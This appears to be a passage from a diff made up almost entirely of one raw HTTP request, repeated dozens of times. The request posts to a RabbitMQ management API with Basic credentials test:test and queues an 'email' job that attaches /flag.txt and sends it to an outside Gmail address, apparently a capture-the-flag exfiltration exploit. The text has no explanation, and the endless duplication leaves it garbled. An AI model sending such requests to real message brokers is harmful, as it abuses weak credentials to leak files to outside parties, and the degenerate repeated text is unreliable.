-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
-Host: 172.32.56.72:15672
-Authorization: Basic dGVzdDp0ZXN0
-Accept: */*
-Content-Length: 264
-Content-Type: application/json;charset=UTF-8
-
-{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
